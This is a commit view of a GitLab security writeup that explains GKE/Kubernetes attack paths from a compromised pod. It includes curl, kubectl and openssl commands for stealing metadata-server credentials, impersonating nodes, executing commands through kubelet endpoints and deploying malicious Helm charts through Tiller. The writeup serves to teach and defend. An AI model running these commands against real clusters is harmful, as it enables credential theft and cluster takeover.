Commit b729f2db authored by Greg Johnson

minor changes for formatting and grammar

parent 1733569b
This writeup is therefore here to help explore this type of breach, looking at K8s from the perspective of an attacker with no initial K8s knowledge, but who has managed to get a shell through one of the above scenarios. We’ll focus on GKE specifically as this is what we use at GitLab.
We'll start by looking at the main architecture components, specifically those that are interesting for an attacker, then explore what we can do from our initial shell. If you already know about the main K8s (and GKE) components, feel free to skip the "[Architecture Overview](#architecture-overview)" section and go directly to "[Attack Scenario](#attack-scenario)".
# Table of Contents
- [Architecture Overview](#architecture-overview)
In a generic K8s configuration, the main components/features are the following:
- The Node: It runs one or multiple pods, and is usually implemented as a Linux machine/VM (Compute Engine VMs in GKE).
- The Master node: The node that hosts critical components (a storage component (etcd), a REST API server, and controller and scheduler components).
Within K8s, everything is treated as an "object" and managed through the API server. All object creations/changes are usually submitted in a declarative way, by sending YAML or JSON files. The `kubectl` binary is the classic client used to interact with this REST API. It is however possible to interact with the API using generic web clients (`curl`, `wget`, etc.). Unless configured differently, tokens or private keys will need to be sent in the headers of those requests for them to be accepted (more about auth later).
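As a quick illustration, a raw request could look like the following (a hedged sketch, assuming you are inside a pod where a default service account token is mounted, which we will come back to later):
```
curl -sk -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" \
  https://$KUBERNETES_PORT_443_TCP_ADDR/api
```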
As drawings are better than long explanations, here are some diagrams showing the main components:
You can therefore use the `kubectl` binary you downloaded with the service account credentials:
```
# kubectl --token=`cat /run/secrets/kubernetes.io/serviceaccount/token` --certificate-authority=/run/secrets/kubernetes.io/serviceaccount/ca.crt -n `cat /run/secrets/kubernetes.io/serviceaccount/namespace` --server=https://$KUBERNETES_PORT_443_TCP_ADDR auth can-i create pods
```
Note: When running the `kubectl` binary without auth arguments, it will usually look for those default creds (but we sometimes have to explicitly pass them as arguments).
You should start port scanning the default subnet for open ports.
#### Heapster
8082 is the default "heapster" port in GKE. If found, it will give you, without authentication, some basic information such as:
- /api/v1/model/namespaces/namespaces/ *<-- which namespaces are available*
- /api/v1/model/nodes/ *<-- list of the nodes*
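A minimal sketch of querying it (the IP is a hypothetical address you would have found while scanning; the paths are the ones from the heapster model API documentation):
```
curl -s http://10.8.1.1:8082/api/v1/model/namespaces/
curl -s http://10.8.1.1:8082/api/v1/model/nodes/
```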
For a more complete list of the REST URLs, you may want to have a look at https://github.com/kubernetes-retired/heapster/blob/master/docs/model.md
#### Kubelet (unauthenticated)
The kubelet API daemon, which is the primary agent running on each node to maintain the desired state of its pods, is potentially another source of information, listening on TCP 10255 for unauthenticated HTTP requests. It contains really powerful debug endpoints (/run, /exec) which, in the case of GKE, should be disabled by default (that would be too easy...). It should however respond to some basic info requests (paths taken from https://github.com/kubernetes/kubernetes/blob/master/pkg/kubelet/server/server.go):
```
curl http://10.8.1.1:10255/pods/
curl http://10.8.1.1:10255/stats/
curl http://10.8.1.1:10255/spec/
curl http://10.8.1.1:10255/metrics/
```
`/pods` is the most interesting endpoint for an attacker: it contains quite a bit of information about pods, IP addresses, container names, secret names, and URL paths.
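For instance, a rough sketch of pulling out pod names and mounted secret names (assuming you can drop a `jq` binary onto the pod the same way you fetched `kubectl`; the node IP is the same hypothetical one as above):
```
curl -s http://10.8.1.1:10255/pods/ | jq -r '.items[] | [.metadata.namespace, .metadata.name, .status.podIP] | @tsv'
curl -s http://10.8.1.1:10255/pods/ | jq -r '.items[].spec.volumes[]? | select(.secret) | .secret.secretName'
```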
#### Metrics
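If workload identity and metadata concealment are not enabled, the node's `kube-env` instance attribute can typically be read from a pod through the GCE metadata server (a sketch using the standard metadata endpoint; the exact command in the original example may differ):
```
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env"
```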
The output should contain bootstrapping credentials within the KUBELET_KEY, KUBELET_CERT and CA_CRT environment variables. As stated by Google: *GKE uses instance metadata to configure node VMs, but some of this metadata is potentially sensitive and should be protected from workloads running on the cluster.*
Those credentials have certificate signing request (CSR) permissions and an attack vector has been found that abuses those credentials to request certificates on behalf of nodes (see https://www.4armed.com/blog/hacking-kubelet-on-gke/ and https://github.com/bgeesaman/kube-env-stealer, congrats to both of them!).
Since CSRs are automatically signed, once a certificate is obtained, this certificate can be used to interact with the master API, impersonating the node that was chosen in the certificate signing request.
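Once such a node certificate has been signed, it can be used with `kubectl` in place of the service account token (a sketch with hypothetical file names; what you can actually read depends on the permissions of the impersonated node):
```
kubectl --server=https://$KUBERNETES_PORT_443_TCP_ADDR \
  --certificate-authority=ca.crt \
  --client-certificate=node.crt \
  --client-key=node.key \
  get secrets --all-namespaces
```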
4armed nicely released [kubeletmein](https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/) to automate the process of getting the initial keys, submitting CSRs and creating config files for the `kubectl` binary.
Brad Geesaman also released some [scripts](https://github.com/bgeesaman/kube-env-stealer/blob/master/gke-kubelet-csr-secret-extractor.sh) to automate all this.
At the time of writing, in a default GKE cluster install, the attack still works as it does not rely on a bug but on a default configuration (if the two protections mentioned at the beginning of this paragraph are not used). Depending on which nodes you can impersonate, their permissions, and the secrets they have access to, you may be able to get to `cluster-admin`. You should refer to the table in the "Authorization" paragraph to look for the service accounts that are the most interesting to impersonate.
### Underlying GCP service account
The pods in GKE run on a GCP VM (their Node), and if requests to the metadata server are made, they will be seen as originating from the node. This allows the pods to query the Node's default service account information/credentials. As for the previous attack path, this will only work if [workload identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity) is **not** enabled (or, if enabled, you could be lucky and a "binding" between the k8s service account and a powerful underlying GCP service account has been configured, but it is less likely). Depending on the rights/scope associated with the account, it may allow you to expand into GCP (you may want to refer to Chris's post about [GCP privilege escalation](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) at this point!).
To get this service account information:
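The following is a sketch using the standard GCE metadata endpoints (the exact commands in the original example may differ slightly):
```
curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email"
curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes"
curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
```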
If you’re interested in learning more, the following are some good reads:
- https://alexei-led.github.io/post/k8s_node_shell/
- https://github.com/kvaps/kubectl-node-shell
If you end up on the node, it's a GCP Compute Engine VM and you should once more refer to Chris Moberly's post about [GCP privilege escalation](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)! It is interesting to be aware that by default, the OS image used for Nodes in GKE is the "Container-Optimized OS" (COS) made by Google, based on Chromium OS. If you managed to break out of the pod and get a shell there, you won't have any package manager and almost none of the basic network tools. However, COS has a "toolbox" utility to help with debugging; you can find the binary at `/usr/bin/toolbox` (https://cloud.google.com/container-optimized-os/docs/how-to/toolbox). It will pull a docker image, a Debian-like environment, with `apt` as the package manager and the classic net tools available. The following shows the first time the toolbox binary is launched:
```
gke-cluster-1-default-pool-81f6e491-qq7g ~ # /usr/bin/toolbox
20180918-00: Pulling from google-containers/toolbox
Spawning container root-gcr.io_google-containers_toolbox-20180918-00 on /var/lib
Press ^] three times within 1s to kill container.
root@gke-cluster-1-default-pool-81f6e491-qq7g:~#
```
You will feel more "at home" in the toolbox env, which will also have gcloud installed. Much better than the classic COS shell!
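For example, once inside the toolbox shell (a sketch; the packages are just examples of tools you might want, and gcloud is already there):
```
apt-get update && apt-get install -y nmap tcpdump dnsutils
gcloud auth list
gcloud config list
```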
## Tools that automate recon and some of those attacks
As there are no other known full GKE attack vectors/paths that can be described (starting from a pod with a zero-rights service account), if you could not escalate to something interesting, the best option is to continue exploring everything available. Below are some of the main component details that can be interesting to look at.
### API server
The master API server is the main entry point in the cluster and you may not be able to get anything out of it. It is however interesting to try to query old API paths or metrics data, for instance. Even though it is usually queried via `kubectl`, it is possible to query the API with `curl`/`wget`. You will need to submit a bearer token in your request. The API is reachable within the cluster via a "service" (basically a K8s object doing load balancing) called "kubernetes" (its type is "ClusterIP"; you can see it by listing services with `kubectl get service`).
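A minimal sketch of poking at it with `curl` from a pod (the "kubernetes" service is also resolvable as `kubernetes.default.svc` through the cluster DNS; `-k` skips certificate verification, you can pass the mounted `ca.crt` instead):
```
TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
curl -sk -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc/
curl -sk -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc/apis
curl -sk -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc/metrics
```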
Here is an example of the REST paths returned from the webroot for a default GKE install:
The Kubelet daemon on the nodes also has an API server. You should check if it is enforcing authentication (HTTPS port 10250; by default in GKE, authentication is turned on) and see if you can attack it instead of the master API server (also useful if the master API server is firewalled). You can try to list pods as a test:
`curl -sk https://<node_ip>:10250/pods/`
The API server on the Kubelet is not documented (*The kubelet can also listen for HTTP and respond with a simple API (underspec’d currently)*), but the [source code](https://github.com/kubernetes/kubernetes/blob/master/pkg/kubelet/server/server.go#L544) shows the following debug endpoints are potentially available. I've added formatting for readability:
```
paths := []string{
    "/run/",
    "/exec/",
    "/attach/",
    "/portForward/",
    "/containerLogs/",
    "/runningpods/",
    pprofBasePath,
    logsPath,
}
```
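If those debug endpoints happen to be enabled, the simplest one to try is probably `/run/`, which executes a single command in a container (a sketch; the `cmd` parameter name is the one commonly seen in public kubelet exploitation writeups, and a valid token is still needed when authentication is enforced):
```
curl -k -XPOST -H "Authorization: Bearer xxxxx" "https://<node IP>:10250/run/<namespace>/<pod name>/<container name>" -d "cmd=id"
```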
If you are lucky enough to have those debug endpoints enabled and you have some valid token, `/exec/` is there and provides remote shell functionality (nice!):
`curl -k -XPOST -H "Authorization: Bearer xxxxx" "https://<node IP>:10250/exec/<namespace>/<pod name>/<container name>" -d "command=id" -d "input=1" -d "output=1" -d "tty=1"`
You should however get a response similar to this:
```
"message": "Upgrade request required",
"reason": "BadRequest",
"code": 400
```
The `upgrade request` response is because websockets should be used. The current websocket implementation of the kubelet API server requires a specific websocket header (`sec-websocket-protocol: v4.channel.k8s.io`).
We didn't code any client (we will update this post if we code a small one), but execution can still be achieved blindly using openssl as an SSL client, pasting a raw request into it (which is probably the easiest as an attacker, fewer tools to download/install):
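A rough, untested sketch of what that looks like (the placeholders follow the same convention as the `curl` example above, the `Sec-WebSocket-Key` value is an arbitrary base64-encoded 16-byte string, and the pasted request must be terminated with an empty line):
```
openssl s_client -quiet -connect <node IP>:10250
# then paste a raw upgrade request such as:
POST /exec/<namespace>/<pod name>/<container name>?command=id&input=1&output=1&tty=1 HTTP/1.1
Host: <node IP>:10250
Authorization: Bearer xxxxx
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: MTIzNDU2Nzg5MDEyMzQ1Ng==
Sec-WebSocket-Protocol: v4.channel.k8s.io

```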
Helm charts are a way to deploy full applications onto a K8s cluster, basically combining multiple yaml config files together, hence Helm is often considered to be a "package manager" for K8s.
Before v3 of Helm, a server component was used, called "Tiller". This component was installed within a pod and is known to be a classic privilege escalation weakness, as it accepts unauthenticated connections from within the cluster to deploy any "chart". An attacker on a pod can of course abuse this to deploy pods of their choosing, create service accounts, etc.
A good writeup from [ropnop](https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/) perfectly describes the type of chart you would want to deploy as an attacker: basically, you download the `helm` binary client and push charts that help you read files on the Tiller pod (the Tiller service account is usually cluster admin) or create other pods/service accounts you can use to elevate privileges. Helm version 3 has completely removed the Tiller component as it is/was indeed difficult to integrate securely within the cluster.
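As a rough sketch with the Helm v2 client (the address below is Tiller's default service and gRPC port in most installs; the chart name is just a placeholder for whatever malicious chart you built):
```
helm --host tiller-deploy.kube-system.svc.cluster.local:44134 version
helm --host tiller-deploy.kube-system.svc.cluster.local:44134 install --name pwned ./malicious-chart
```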
## Cheat Sheet